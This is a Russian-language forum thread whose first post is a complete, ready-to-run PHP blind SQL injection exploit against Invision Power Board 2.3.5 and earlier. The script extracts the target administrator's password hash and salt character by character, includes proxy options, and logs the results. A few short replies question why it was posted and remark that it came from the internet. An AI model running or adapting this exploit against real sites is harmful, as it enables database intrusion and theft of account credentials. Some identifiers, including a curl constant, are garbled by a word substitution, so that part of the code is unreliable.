FORUM Carcd  

Вернуться   FORUM Carcd > Компьютеры и КПК > Компьютерный форум > Безопасность

Безопасность Информация о новых вируса, дырах и т.д.

Ответ
 
Опции темы
Старый 14.01.2009, 07:35   #1
Новичок
 
Регистрация: 29.12.2008
Сообщений: 10
Вес репутации: 0


По умолчанию

<?php

error_reporting(E_ALL);

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

// IPB <= 2.3.5 sql injection exploit

// Version 1.0

// NB! This exploit is meant to be run as php CLI!

// http://www.php.net/features.commandline

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

//================================================== ===================

$url = 'http://localhost/ipb.2.3.5/';

$id = 1;// ID of the target user, default value "1" is admin's ID

$prefix = 'ibf_';// IPB table prefix, default is "ibf_"

# Proxy settings

# Be sure to use proxy

//$proxy_ip_port = '127.0.0.1:8118';

//$proxy_user_password = 'someuser:somepassword';

$outfile = './ipblog.txt';// Log file

//================================================== ====================

///////////////////////////////////////////////////////////////////////

// Don't mess below this line, unless you know the stuff

///////////////////////////////////////////////////////////////////////

//================================================== ===================

///////////////////////////////////////////////////////////////////////

$cli = php_sapi_name() === 'cli';

//================================================== ===================

// Warning, if executed from webserver

//================================================== ===================

if(!$cli)

{

if(!isset($_REQUEST['wtf-is-cli']))

{

echo "<html><head><title>Attention!</title></head>\n";

echo "<body>

<center>\n";

echo "<h1>Warning!</h1>\n";

echo "This exploit is meant to be used as php CLI script!
\n";

echo "More information:
\n";

echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a>
\n";

echo "Still, you can try to run it from webserver.
\n";

echo "Just press the button below and prepare for long waiting
\n";

echo "And learn to use php CLI next time, please ...
\n";

echo "<form method=\"get\">\n";

echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";

echo "</form>\n";

echo "</center></body></html>\n";

exit;

}

else

{

// Let's try to maximize our chances without CLI

@set_time_limit(0);

}

}

//================================================== ===================

xecho("Target: $url\n");

xecho("Sql table prefix: $prefix\n");

xecho("Testing target URL ... \n");

test_target_url();

xecho("Target URL seems to be valid\n");

xecho("Testing target ID ... \n");

test_target_id();

xecho("Target ID seems to be valid\n");



$hash = get_hash();

$salt = get_salt();



add_line("Target: $url");

add_line("User ID: $id");

add_line("Hash: $hash");

add_line("Salt: $salt");

add_line("------------------------------------------");



xecho("\n------------------------------------------\n");

xecho("Hash: $hash\n");

xecho("Salt: $salt");

xecho("\n------------------------------------------\n");



xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");

die("See ya! \n");

//////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////

function test_target_url()

{

global $url;



$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';

$buff = trim(make_post($url, $post, '', $url));

if($buff !== 'found')

{

die('Invalid response, target URL not valid? Exiting ...');

}

}

//////////////////////////////////////////////////////////////////////

function test_target_id()

{

global $url, $prefix, $id;



$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';

if(!test_condition($post))

{

die('Invalid response, target ID not valid? Exiting ...');

}

}

///////////////////////////////////////////////////////////////////////

function get_salt()

{

$len = 5;

$out = '';



xecho("Finding salt ...\n");



for($i = 1; $i < $len + 1; $i ++)

{

$ch = get_saltchar($i);

xecho("Got pos $i --> $ch\n");

$out .= "$ch";

xecho("Current salt: $out \n");

}



xecho("\nFinal salt: $out\n\n");



return $out;

}

///////////////////////////////////////////////////////////////////////

function get_saltchar($pos)

{

global $prefix, $id;



$char = '';

$min = 32;

$max = 128;

$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";

$curr = 0;



while(1)

{

$area = $max - $min;

if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post);



if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

}



break;

}



$half = intval(floor($area / 2));

$curr = $min + $half;



$post = $pattern . '%253e' . $curr;



$bigger = test_condition($post);



if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

}



xecho("Current test: $curr-$max-$min\n");

}



return $char;

}

///////////////////////////////////////////////////////////////////////

function get_hash()

{

$len = 32;

$out = '';



xecho("Finding hash ...\n");



for($i = 1; $i < $len + 1; $i ++)

{

$ch = get_hashchar($i);

xecho("Got pos $i --> $ch\n");

$out .= "$ch";

xecho("Current hash: $out \n");

}



xecho("\nFinal hash: $out\n\n");



return $out;

}

///////////////////////////////////////////////////////////////////////

function get_hashchar($pos)

{

global $prefix, $id;



$char = '';

$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";



// First let's determine, if it's number or letter

$post = $pattern . '%253e57';

$letter = test_condition($post);



if($letter)

{

$min = 97;

$max = 102;

xecho("Char to find is [a-f]\n");

}

else

{

$min = 48;

$max = 57;

xecho("Char to find is [0-9]\n");

}



$curr = 0;



while(1)

{

$area = $max - $min;

if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post);



if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

}



break;

}



$half = intval(floor($area / 2));

$curr = $min + $half;



$post = $pattern . '%253e' . $curr;



$bigger = test_condition($post);



if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

}



xecho("Current test: $curr-$max-$min\n");

}



return $char;

}

///////////////////////////////////////////////////////////////////////

function test_condition($p)

{

global $url;



$bret = false;

$maxtry = 10;

$try = 1;



$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';

$post = sprintf($pattern, $p);



while(1)

{

$buff = trim(make_post($url, $post, '', $url));



if($buff === 'found')

{

$bret = true;

break;

}

elseif($buff === 'notfound')

{

break;

}

elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)

{

die("Sql error! Wrong prefix?\nExiting ... ");

}

else

{

xecho("test_condition() - try $try - invalid return value ...\n");

$try ++;

if($try > $maxtry)

{

die("Too many tries - exiting ...\n");

}

else

{

xecho("Trying again - try $try ...\n");

}

}

}



return $bret;

}

///////////////////////////////////////////////////////////////////////

function make_post($url, $post_fields='', $куки = '', $referer = '', $headers = FALSE)

{

$ch = curl_init();

$timeout = 120;

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');



if(!empty($GLOBALS['proxy_ip_port']))

{

curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);



if(!empty($GLOBALS['proxy_user_password']))

{

curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);

}

}



if(!empty($куки))

{

curl_setopt ($ch, CURLOPT_куки, $куки);

}



if(!empty($referer))

{

curl_setopt ($ch, CURLOPT_REFERER, $referer);

}



if($headers === TRUE)

{

curl_setopt ($ch, CURLOPT_HEADER, TRUE);

}

else

{

curl_setopt ($ch, CURLOPT_HEADER, FALSE);

}



$fc = curl_exec($ch);

curl_close($ch);



return $fc;

}

///////////////////////////////////////////////////////////////////////

function add_line($line)

{

global $outfile;



$line .= "\n";

$fh = fopen($outfile, 'ab');

fwrite($fh, $line);

fclose($fh);



}

///////////////////////////////////////////////////////////////////////

function xecho($line)

{

if($GLOBALS['cli'])

{

echo "$line";

}

else

{

$line = nl2br(htmlspecialchars($line));

echo "$line";

}

}

//////////////////////////////////////////////////////////////////////

?>
zaratustra вне форума   Ответить с цитированием
Старый 14.01.2009, 15:32   #2
Местный
 
Регистрация: 22.05.2007
Сообщений: 195
Вес репутации: 0


По умолчанию

и что из этого следует ?
Фтвкун вне форума   Ответить с цитированием
Старый 14.01.2009, 15:35   #3
Местный
 
Регистрация: 18.11.2007
Сообщений: 306
Вес репутации: 0


По умолчанию

раз такой умный, то попробуй эксплойт залить)))
makkenzi вне форума   Ответить с цитированием
Старый 14.01.2009, 15:52   #4
Местный
 
Регистрация: 09.06.2004
Адрес: Воронежская обл
Сообщений: 1,635
Вес репутации: 0
Репутация: 0


По умолчанию

Цитата:
'Фтвкун' *'389305' *'14.1.2009, 15:32']и что из этого следует ?


Понтуется. Так же, как и с прошивками.
Softer вне форума   Ответить с цитированием
Старый 14.01.2009, 16:56   #5
Местный
 
Регистрация: 20.02.2007
Адрес: ХМАО
Сообщений: 245
Вес репутации: 0


По умолчанию

Нехрена се ,ты как код то вытащил?Админы чет я непойму что права доступа позволяют php файл выдернуть с сервака, мож и код поменять и обратно положить тип так и было.Теперь понятно откуда баги левые банеры и спам.Вотэто дырень.
колт86 вне форума   Ответить с цитированием
Старый 14.01.2009, 16:59   #6
Местный
 
Регистрация: 12.03.2004
Сообщений: 1,412
Вес репутации: 0


По умолчанию

Ничего он не вытащил, и сам ничего не писал. Это код из интернета.
romik вне форума   Ответить с цитированием
Старый 17.01.2009, 00:45   #7
Местный
 
Регистрация: 20.11.2004
Сообщений: 1,891
Вес репутации: 0


По умолчанию

Насколько я помню на форуме более свежий движок
Loader вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Exploit.PHP. Inject.f matrus3 Безопасность 0 26.06.2007 18:14
carman scan II USB board _uart_ Диагностика 0 21.05.2007 19:14
Exploit.Win32. IMG-WMF.y matrus3 Безопасность 0 19.03.2007 15:18
MegaSquirt Electronic Fuel Injection Темур Курилка 1 04.02.2007 22:28


Текущее время: 00:26. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot